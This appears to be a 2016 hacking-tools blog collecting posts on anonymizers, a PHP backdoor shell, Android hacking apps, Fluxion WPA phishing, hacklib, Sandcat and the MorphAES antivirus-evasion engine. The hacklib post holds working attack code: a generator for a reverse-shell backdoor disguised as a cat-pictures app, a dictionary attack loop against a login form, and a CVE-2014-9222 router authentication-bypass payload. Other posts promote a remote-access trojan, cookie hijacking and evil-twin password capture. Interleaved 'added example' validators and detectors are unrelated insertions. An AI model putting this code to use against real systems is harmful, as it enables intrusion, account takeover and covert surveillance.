

Sunday, October 16, 2016

A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers - 4nonimizer


What is 4nonimizer?
It is a bash script for anonymizing the public IP used to browse the Internet, managing the connection to the TOR network and to different VPN providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and downloads the credentials. It also records, every 300 seconds, the public IP we are using in log files.
This script is enabled as a service on systemd systems and uses a default VPN (VPNBook) at system startup.

Installation
Download the repo using git, execute the command ./4nonimizer install in that directory and follow the on-screen instructions; 4nonimizer will be moved to the directory /opt/ and installed as a service.
This script has full compatibility with Kali Linux. It has also been tested on, and should work on, other distributions like Debian, Ubuntu and Arch (Manjaro); however, there could be some bugs or unexpected behaviour (please comment if you find any!).

Options
Once 4nonimizer is installed, enter the command 4nonimizer help to get the help, which shows all the available parameters:

Available VPNs
Currently it supports the following VPN providers:
- HideMyAss https://www.hidemyass.com/
- TorGuard https://torguard.net/
- VPNBook (by default) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNMe https://www.vpnme.me/
- VPNKeys https://www.vpnkeys.com/

Install a new VPN
To install an additional VPN, we have to use the following structure so that 4nonimizer is able to integrate it and perform operations with it.
First, we have to create the following directory structure under /vpn/ within the 4nonimizer path:


In our example we create the folder /vpntest/ and place in it all the .ovpn files we have. If the .ovpn files do not contain the certificate, we put it in the same folder, as the certificate.crt in the example shows.
In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:


If we have performed all the steps correctly, when we execute the command 4nonimizer change_provider the menu will show our VPN:


As you can see in the picture, option [7] is the VPN we've created.

Getting credentials and ovpn files automatically
If the VPN provider allows automated retrieval of the credentials and/or the .ovpn files, 4nonimizer has standardized the following script names and locations:
- /opt/4nonimizer/vpn/provider/vpn-get-pass.sh


- /opt/4nonimizer/vpn/provider/vpn-get-ovpn.sh



4nonimizer automatically detects the presence of both scripts and indicates (Auto-pass Login) or (Auto-get OVPN) where applicable.
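As an added example (not part of 4nonimizer), the following Python script checks that a provider directory follows the layout described above before it is selected with change_provider: it looks for .ovpn profiles, for certificate.crt when a profile has no inline <ca> block, for a two-line pass.txt, and for the optional vpn-get-pass.sh / vpn-get-ovpn.sh helpers. The inline <ca> test, the permission check on pass.txt and the executable check on the helpers are assumptions of this example, not behaviour documented by 4nonimizer:

```python
# Added example, not 4nonimizer's own code: validate a provider directory laid
# out the way the post describes before selecting it with change_provider.
# Layout assumed from the post:
#   <provider_dir>/*.ovpn            one or more OpenVPN profiles
#   <provider_dir>/certificate.crt   needed only when a profile has no inline <ca> block
#   <provider_dir>/pass.txt          exactly two lines: username, then password
#   <provider_dir>/vpn-get-pass.sh   optional helper (Auto-pass Login)
#   <provider_dir>/vpn-get-ovpn.sh   optional helper (Auto-get OVPN)
import os
import re
import stat
import sys
from pathlib import Path

INLINE_CA = re.compile(r"^<ca>\s*$", re.MULTILINE)


def check_provider_dir(provider_dir):
    """Return a list of problems; an empty list means the layout is usable."""
    d = Path(provider_dir)
    if not d.is_dir():
        return [f"{d} is not a directory"]
    problems = []

    profiles = sorted(d.glob("*.ovpn"))
    if not profiles:
        problems.append("no .ovpn profiles found")

    # A profile must embed its CA (<ca>...</ca>) or the folder must ship
    # certificate.crt, as in the post's /vpntest/ example.
    has_cert = (d / "certificate.crt").is_file()
    for p in profiles:
        if not INLINE_CA.search(p.read_text(errors="replace")) and not has_cert:
            problems.append(f"{p.name} has no inline <ca> block and certificate.crt is missing")

    pw = d / "pass.txt"
    if not pw.is_file():
        problems.append("pass.txt is missing")
    else:
        lines = [ln for ln in pw.read_text().splitlines() if ln.strip()]
        if len(lines) != 2:
            problems.append(f"pass.txt must contain exactly 2 lines (username, password), found {len(lines)}")
        # Hardening check that the post does not mention: the file holds a
        # cleartext password, so other local users must not be able to read it.
        if pw.stat().st_mode & (stat.S_IRGRP | stat.S_IROTH):
            problems.append("pass.txt is readable by group/others; chmod 600 it")

    # The optional helper scripts are only useful if they can be executed.
    for helper in ("vpn-get-pass.sh", "vpn-get-ovpn.sh"):
        h = d / helper
        if h.exists() and not os.access(h, os.X_OK):
            problems.append(f"{helper} is present but not executable")
    return problems


def auto_features(provider_dir):
    """Mirror the labels 4nonimizer shows when the helper scripts are present."""
    d = Path(provider_dir)
    labels = []
    if (d / "vpn-get-pass.sh").is_file():
        labels.append("Auto-pass Login")
    if (d / "vpn-get-ovpn.sh").is_file():
        labels.append("Auto-get OVPN")
    return labels


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/opt/4nonimizer/vpn/vpntest"
    issues = check_provider_dir(target)
    print("OK" if not issues else "\n".join(issues))
    print("features:", ", ".join(auto_features(target)) or "none")
```

Run it as python check_provider.py /opt/4nonimizer/vpn/vpntest after creating the folder; an empty problem list means change_provider should pick the entry up, and the permission warning is worth heeding because the script stores the VPN password in the clear.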



Extras
- Execute 'source 4nonimizer' to activate autocompletion of parameters.
- Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

References
- http://www.hackplayers.com/2016/08/tuto-enmascarar-ip-linux-vpn-tor.html
- http://www.hackplayers.com/2016/10/4nonimizer-un-script-para-anonimizar-ip.html

Versions
- 1.0-beta codename .bye-world! 5/10/2016



Python Client with PHP Shell - tinyshell



Python client with PHP shell; it allows connecting and sending commands over HTTP using POST and GET requests.

Features
  1. Connects with a direct session, with no need for a reverse connection.
  2. Supports password protection.
  3. Can be bound to any file with no damage.
  4. Uses GET/POST requests with error handling.

Usage
The project consists of two files:
  1. Remote shell Python file: the client used to connect to the target: python remote shell.py url password
  2. PHP shell file: the PHP backdoor. The password can be edited manually by modifying the code.

Credits
Lawrence Amer - Vulnerability Lab Researcher.

Video



Monday, October 10, 2016

Top 10 Best Apps 2016 - Android Hacking



Do you want to know how to turn your smartphone into a hacking machine? Then you have come to the right place. Let's talk about the Top 10 Best Android Hacking Apps.

Obs, I'm not responsible for your act

Top 10 Best Android Hacking Apps

#1 Androrat

AndroRat stands for Android Remote Administration Tool. AndroRat is a remote administration tool which is used to control another device without physical access to the victim's device!

See the features of AndroRat

  • Get contacts (and all their information)
  • Get call logs & get all messages
  • Location by GPS/network
  • Monitor received messages live
  • Monitor phone state live (call received, call sent, call missed...)
  • Take a picture from the camera & stream sound from the microphone (or other sources...)
  • Stream video (for the activity-based client only)
  • Show a toast & send a text message
  • Make a call & open a URL in the default browser


Download Androrat



#2 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications. The following information is described in the results, generated when analysis is complete:

Features of DroidBox

  • Hashes for the analyzed package
  • Incoming/outgoing network data
  • File read and write operations
  • Started services and loaded classes through DexClassLoader
  • Information leaks via the network, file and SMS
  • Circumvented permissions
  • Cryptographic operations performed using the Android API
  • Listing broadcast receivers
  • Sent SMS and phone calls


Download DroidBox



#4 zANTI


zANTI is a penetration testing toolkit developed by Zimperium Mobile Security for cyber security professionals. Basically, it allows you to simulate malicious attacks on a network. With the help of zANTI, you will be able to perform various types of operations such as MITM attacks, MAC address spoofing, scanning, password auditing, vulnerability checks and much more. In short, this Android toolkit is a perfect companion for hackers. This app is very professional among Android hacking apps.




Features of zANTI

  • Change the device's MAC address.
  • Create a malicious WiFi hotspot.
  • Hijack HTTP sessions.
  • Capture downloads.
  • Modify HTTP requests and responses.
  • Exploit routers.
  • Audit passwords.
  • Check a device for the Shellshock and SSL POODLE vulnerabilities.


Download zANTI


#5 APK Inspector




APKinspector is a powerful GUI tool to analyse Android apps. The goal of this project is to aid analysts and reverse engineers in visualizing compiled Android packages and their corresponding DEX code.


Download APK Inspector


#6 Droid Sheep

DroidSheep can use victims' accounts, gaining access to sites that don't use a secured and encrypted SSL connection. DroidSheep requires root privileges. While popular sites like Yahoo, Google, and Facebook now support encrypted HTTPS connections that aren't vulnerable to a tool like DroidSheep, there surely are hundreds of others that are.





The DroidSheep APK is also a tool to hack Facebook, Twitter and many other sites via your Android device. DroidSheep uses cookie hijacking to hack these accounts. DroidSheep doesn't reveal the passwords and email to you, but you can access Facebook accounts directly without them, i.e. this app provides a link to access other accounts directly. This tool is the best one in the list of Android hacking apps.


Download Droid Sheep



#7 Arpspoof





Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. Arpspoof redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network. Arpspoof is on the list of my favorite Android hacking apps.


Download Arpspoof



#8 Nmap for Android




Nmap (Network Mapper) is one of the best network scanners (port finders). Nmap was mainly developed for Unix, but now it is available on Windows and Android as well. Nmap for Android is an Nmap app for your phone! Once your scan finishes you can e-mail the results. This application is not an official app, but it looks good, so it is one of the Android hacking apps.


Download NmapA



#9 dSploit 





dSploit is a penetration testing suite developed by Simone Margaritelli for the Android operating system. It consists of several modules that are capable of performing network security assessments on wireless networks, must read guide on


Download dSploit


#10 Wifikill

Wifi Kill Pro Hacking Tool





WiFiKill is an Android tool that you can use to disable the internet connection of a device on the same WiFi network. It is a light-weight tool with a simple interface; you can kick any user off the same WiFi network, which means you can prevent your neighbours from using your WiFi connection with WiFiKill.


Download Wifi Kill Pro


By OffSec

Sunday, October 9, 2016

Transparent Proxy through TOR, I2P, Privoxy, Polipo and modify DNS - anonym8



Transparent proxy through TOR, I2P, Privoxy, Polipo and DNS modification, for simple and better privacy and security; includes Anonymizing Relay Monitor (arm), macchanger, hostname and wipe (cleans RAM/cache & swap space) features. Tested on Debian, Kali and Parrot. To use the graphical interface, you'll need to install GTKdialog, libvte.so.9 and i2p separately.

Script requirements are:
  • Tor        
  • macchanger 
  • resolvconf 
  • dnsmasq    
  • polipo     
  • privoxy           
  • arm        
  • libnotify  
  • curl
  • bleachbit

They'll be installed automatically.
Open a root terminal and type:
cd anonym8_directory (e.g. cd /home/toto/Desktop/anonym8-master)
chmod +x INSTALL.sh
bash INSTALL.sh

You're done!

For more security, use Firefox!
Here are some useful Firefox add-ons:
Profile Manager => https://ftp.mozilla.org/pub/utilities/profilemanager/1.0/
Random Agent Spoofer => https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
NoScript => https://addons.mozilla.org/en-US/firefox/addon/noscript/
uBlock Origin => https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/
HTTPS Everywhere => https://addons.mozilla.org/fr/firefox/addon/https-everywhere/

Reboot your system and enjoy!

@HiroshimanRise
#anonym8 (Privacy Friend)


WPA/WPA2 Security Hacked Without Brute Force - Fluxion



Fluxion is a remake of linset by vk496 with fewer bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) HERE. If you are new, please start by reading the wiki.

Fluxion GUI

How it works
  • Scan the networks.
  • Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password)
  • Use WEB Interface *
  • Launch a FakeAP instance to imitate the original access point
  • Spawn an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
  • A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
  • Each submitted password is verified by the handshake captured earlier
  • The attack will automatically terminate, as soon as a correct password is submitted

Requirements
A Linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. An external wifi card is recommended.

Credits
  1. Deltax @FLuX and Fluxion main developer
  2. Strasharo @Fluxion help to fix DHCPD and pyrit problems, spelling mistakes
  3. vk496 @Linset main developer of linset
  4. ApatheticEuphoria @WPS-SLAUGHTER,Bruteforce Script,Help with Fluxion
  5. Derv82 @Wifite/2
  6. Princeofguilty @webpages
  7. Photos for wiki @ http://www.kalitutorials.net

Useful links
  1. wifislax
  2. kali
  3. linset
  4. ares



Console Web Vulnerability Scan Tools - Syhunt ScanTools




Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: ScanURL, ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools lets you start the task with a single command line. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.


Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.
Please note that the full-featured version of the tools is only available for registered users.

System Requirements


  1. 512 MB of memory
  2. 200 MB of free disk space
  3. Internet connection (optional for remote scanning)
  4. Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, e.g.:
Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

  1. Go to the directory where Syhunt Hybrid is installed using the command prompt.
  2. Use the following command line:
 Scanurl [starturl] -hm:[huntmethod] -gr

Example:
Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

  1. Go to the directory where Syhunt is installed using the command prompt.
  2. Example command-line:
 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

  1. Go to the directory where Syhunt Hybrid is installed using the command prompt.
  2. Use the following command line:
 Scanurl [starturl] -hm:[huntmethod] -srcdir:"[SourceDir]" -gr

Example:
Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr



Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan, it is not necessary to assign it again using the -srcdir option.


Pentesting, Port Scanning, and Logging in anywhere with Python - hacklib



Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:
pip install hacklib
hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:
python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit
Or if you got it using pip:
import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case, you can run the following:
hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):
import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when run, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
Generated App:
Listen for connections with Server:
>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen()
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!


Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:
import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try:
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass  # login failed
Simple dictionary attack using AuthClient:
import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break


Port Scanning:
from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and send a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')
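The two snippets above, the dictionary attack against a login form and the port scan, leave distinctive traces in server-side logs. As an added example (not hacklib code), the following Python detection logic runs over constructed sample lines: a web access log in the common Apache/nginx combined format and a firewall log in a format invented for this example. The window sizes, thresholds and the status-code rule are illustrative assumptions:

```python
# Added example, not hacklib's code: detection logic for the two activities the
# snippets above perform, a dictionary attack against a login form and a port
# scan, run over constructed sample log lines. The access-log format is the
# common Apache/nginx "combined" format; the firewall log format is invented
# for the example.
import re
from collections import defaultdict
from datetime import datetime, timedelta

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
FW_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<action>\w+) src=(?P<src>\S+) dst=\S+ dport=(?P<dport>\d+)$'
)


def sources_over_threshold(events, window, threshold):
    """events: (timestamp, source, key) tuples. Report each source for which at
    least `threshold` distinct keys fall inside some span of length `window`."""
    by_src = defaultdict(list)
    for ts, src, key in events:
        by_src[src].append((ts, key))
    hits = {}
    for src, items in by_src.items():
        items.sort(key=lambda item: item[0])
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {key for _, key in items[start:end + 1]}
            if len(distinct) >= threshold:
                hits[src] = max(hits.get(src, 0), len(distinct))
    return hits


def detect_login_bruteforce(access_lines, window=timedelta(minutes=1), threshold=10, login_path="/login"):
    """Sources that POST to the login form repeatedly without ever being redirected.
    Assumption: a failed form login re-renders the page (200/401/403) while a
    successful one answers with a 302 redirect."""
    events = []
    for n, line in enumerate(access_lines):
        m = ACCESS_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != login_path or m["status"] == "302":
            continue
        ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
        events.append((ts, m["ip"], n))  # every attempt counts, so the key is unique
    return sources_over_threshold(events, window, threshold)


def detect_port_scan(fw_lines, window=timedelta(seconds=10), threshold=20):
    """Sources that touch many distinct destination ports within a short window."""
    events = []
    for line in fw_lines:
        m = FW_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["src"], int(m["dport"])))
    return sources_over_threshold(events, window, threshold)


# Constructed sample logs: one address hammers /login and sweeps ports,
# another logs in normally (POST answered with a 302, then a GET).
BASE = datetime(2016, 10, 9, 12, 0, 0)


def sample_access_log():
    lines = []
    for i in range(12):
        ts = (BASE + timedelta(seconds=2 * i)).strftime("%d/%b/%Y:%H:%M:%S")
        lines.append(f'203.0.113.7 - - [{ts} +0000] "POST /login HTTP/1.1" 200 1532 "-" "python-requests/2.11"')
    ts = (BASE + timedelta(seconds=5)).strftime("%d/%b/%Y:%H:%M:%S")
    lines.append(f'198.51.100.2 - - [{ts} +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append(f'198.51.100.2 - - [{ts} +0000] "GET /dashboard HTTP/1.1" 200 8120 "-" "Mozilla/5.0"')
    return lines


def sample_firewall_log():
    lines = []
    for port in range(1, 31):
        ts = (BASE + timedelta(milliseconds=100 * port)).strftime("%Y-%m-%d %H:%M:%S")
        lines.append(f"{ts} DROP src=203.0.113.7 dst=192.0.2.10 dport={port}")
    lines.append(f"{BASE:%Y-%m-%d %H:%M:%S} ACCEPT src=198.51.100.2 dst=192.0.2.10 dport=443")
    return lines


if __name__ == "__main__":
    print("login brute force:", detect_login_bruteforce(sample_access_log()))
    print("port scan:", detect_port_scan(sample_firewall_log()))
```

The status-code rule in detect_login_bruteforce is the weakest assumption: confirm how your own application answers a failed login (some return 200 with an error message, others 401) before settling on a threshold, and feed real lines through the parsers rather than the constructed ones.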
Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:
>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.


FTP authentication:
import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'


Socks4/5 proxy scraping and tunneling:
>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read()
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')


Word Mangling:
from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()
Output:
T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test
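As an added example (not hacklib code), here is the defensive counterpart of the Mangle snippet above: a password check that rebuilds the same leet, number and year variants for a small list of forbidden base words and rejects a candidate that is only such a variant. The leet map and the meaning of the Mangle parameters are assumptions; the output above only shows e->3, s->$ and the ranges 0..10 and 1990..2016:

```python
# Added example, not hacklib's code: the defensive counterpart of the Mangle
# snippet above. It rebuilds the same three transformations (leet substitution,
# numeric prefix/suffix, year prefix/suffix) and rejects a candidate password
# that is merely one of those variants of a deny-listed word. The leet map and
# the parameter meanings are assumptions: the output above only reveals e->3,
# s->$, and the ranges 0..10 and 1990..2016.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "$"}


def leet(word):
    """Substitute the classic leet characters, leaving other characters and their case alone."""
    return "".join(LEET.get(c.lower(), c) for c in word)


def mangle(word, num_lo=0, num_hi=10, year_lo=1990, year_hi=2016):
    """All variants Mangle(word, num_lo, num_hi, year_lo, year_hi) would emit,
    plus the word itself and its plain leet form."""
    bases = {word, leet(word)}
    variants = set(bases)
    affixes = list(range(num_lo, num_hi + 1)) + list(range(year_lo, year_hi + 1))
    for base in bases:
        for n in affixes:
            variants.add(f"{base}{n}")
            variants.add(f"{n}{base}")
    return variants


def is_trivial_mangling(candidate, wordlist):
    """True when candidate matches (case-insensitively) a mangled form of any listed word."""
    cand = candidate.lower()
    return any(cand in {v.lower() for v in mangle(w)} for w in wordlist)


def password_problems(candidate, wordlist, min_len=12):
    """Policy check: length first, then the dictionary-variant test."""
    problems = []
    if len(candidate) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if is_trivial_mangling(candidate, wordlist):
        problems.append("is a simple mangling of a dictionary word")
    return problems


if __name__ == "__main__":
    deny = ["test", "password", "welcome"]
    for pw in ("Test2016", "P4$$w0rd1", "correct horse battery staple"):
        print(pw, "->", password_problems(pw, deny) or "ok")
```

The deny-list should be built from the same sources an attacker would use (the site name, product names, the most common passwords), since the check only catches variants of words it knows about.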


Pattern Create:
from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()
Output:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A


Pattern Offset:
from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()
Output:
[+] Offset: 50




Thursday, October 6, 2016

PenTest Oriented Web Browser - Sandcat Browser 5.3



Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit http://www.syhunt.com/sandcat/ . See also the docs directory and credits section below for a few more details about the Sandcat architecture.

Directories
  • /docs - Lua API documentation
  • /packs - contents of uncompressed pack files
    • /Common - common CSS, widgets and scripts package (Common.pak)
    • /Resources - resources package (Resources.pak)
  • /src - the main executable source and built-in resource files
    • /core - user interface source
    • /html - user interface resources (HTML)
    • /lua - Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.

Compiling
For compiling Sandcat, you will just need Catarinka and pLua.
The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE - you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get - I will try to do the same soon.
Some work is still needed before a Mac or Linux version materializes.

ChangeLog

5.3

This upgrade brings more stability on newer OSes.
  • Fixed: constant freeze during navigation under some Windows installations (IPC related).
  • Fixed: AV when restoring minimized Sciter dialog.
  • Replaced the Selenite library with Catarinka.

5.2

  • Added the ability to create offscreen Chromium renderers using the Lua API.
  • Improved tab status bar text handling.
  • Improved task script error handling.
  • Improved live headers.
  • Improved startup for Windows 10 compatibility.
  • Make window close work as cancel in Preferences dialog.
  • The Chromium library was upgraded to the latest release.
  • Some extensive code cleanup.
  • Minor user experience improvements.
  • 64-bit version now available separately (special thanks to @RJ35 for fixing a Chromium related crash under Win64 environments, making this release possible)
  • Fixed: a rare crash when switching tabs.

5.1

This release addresses minor issues like a crash when loading a homepage during startup or calling the context menu from a loaded web page.

5.1 Beta 3

This release uses the latest Chromium binaries. This fixes some instability issues when browsing with the live headers enabled.

5.1 Beta 2

This release is focused on stability and performance, as well as some other improvements such as being able to ignore certificate errors while navigating and open PDF files.
Here is what changed in version 5.1:
  • Switched to the WACEF Chromium framework and the latest Chromium binaries. This significantly improves speed and stability, and fixes some issues during shutdown.
  • Most preferences now get applied instantly (just need to open a new tab instead of restarting).
  • Added a certificate error dialog.
  • Added a PDF viewer plugin.
  • Added proxy support.
  • Improved Lua integration.
  • Minor compiler optimizations.
  • The OpenSSL library was upgraded to the latest release.
  • The Selenite library was upgraded to the latest release.

5.0

We're excited to announce a brand new version of our Sandcat Browser (codenamed Catarinka browser), now available as a free, open source project - because many people asked for it, the entire source for Sandcat is now available on GitHub. Feel free to fork it, examine it, contribute code, send suggestions, report or fix issues.
Here is what changed in version 5.0 beta 1:

  • Faster startup and responsiveness.
  • Huge refactoring and cleanup of the current code.
  • The Chromium library was upgraded to the latest release (incredibly fast!).
  • Improved compatibility with 64-bit Windows editions.
  • Improved source code editor.
  • Available as free, open source/community edition (under a BSD-3-Clause license).
  • Built using components and libraries from the Catarinka toolkit (also made open source at the same time with this release and under the same license).
  • Includes the Selenite Lua library - a multi-purpose set of Lua extensions developed to make the development of Lua extensions easier in Sandcat. The code for Selenite is now open source, under the MIT license. The library documentation is available here.
  • Fixed: output of the SHA1 and the full URL encoders that come with the pen-tester pack. 



Monday, October 3, 2016

IDPS & SandBox & AntiVirus STEALTH KILLER - MorphAES



MorphAES is the world's first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent.

Properties:

  • Polymorphism (AES encryption)
  • Metamorphism (logic and constants changing)
  • Platform independent (Linux/BSD/Windows)
  • IDPS stealthing (the total number of possible signatures for one given code is larger than the number of atoms in the universe)
  • Sandbox evasion (special assembly instructions)
  • Realism (no null bytes)
  • Can produce executables (malware)
  • Input code can have arbitrary length
Dependencies for the morpher:
  • Python 2.7 - main engine
  • Python Crypto 2.6 - for encryption
Dependencies for the code execution:
  • 64-bit Intel AES-NI - for decryption
Nonetheless, there are some limitations (aka white-hat aspects):
  • Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
  • Unicode null bytes might still work (but who cares?)
  • It will only work on 64-bit Intel processors with AES-NI support, but since all users' PCs (like Pentium, Celeron, i3, i5, i7) and the industry's servers (like Xeon) have it, it's more a specification than a limitation, thus a 32-bit implementation is impractical
  • Almost any shellcode is guaranteed to work; however, arbitrary code (malware) isn't
  • Windows/BSD PoC and executables are in progress...

How it works
  1. Shellcode padding with NOPs (since AES is a block cipher)
  2. Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) - polymorphism
  3. Constants randomization, logic changes, instructions modification and rewriting - metamorphism

HowTo
For Linux:
sudo apt-get install python python-crypto
Execute the Python script and enter your shellcode, or nothing for a default Linux shell. You can specify your own execution address as well.
It is possible to build and execute on Windows/BSD/Mac as well, but I'm still testing it.
You can also use the Linux PoC in assembly:
as shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
./shellcode
Every file is commented and explained

Tests
At this point, it should be pretty obvious that the hashes would be different every time, but let's compare the SSDEEP hashes of 2 Linux executables of the same shellcode:
  • 96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh,
  • 96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh,
Well, there's something in common, but globally those are 2 different signatures. Now what about the shellcode itself:
  • 48:eip2bR2LRNtRPORDGRopRBXR3cRzER2vRU9BnH6ksr:Srn+,
  • 48:6RjNeR2IRN7RPWRDeRokRB5R3xRz3R28RUxFT2+75eFK9iKMAdXAJKo:O9Tdwoo,
Almost totally different signatures for the same morphed shellcode!
At the publication date, the executable was detected as shellcode by only 2 out of 53 antiviruses (AVG and Ikarus) on VirusTotal, but now it just fails to analyze.
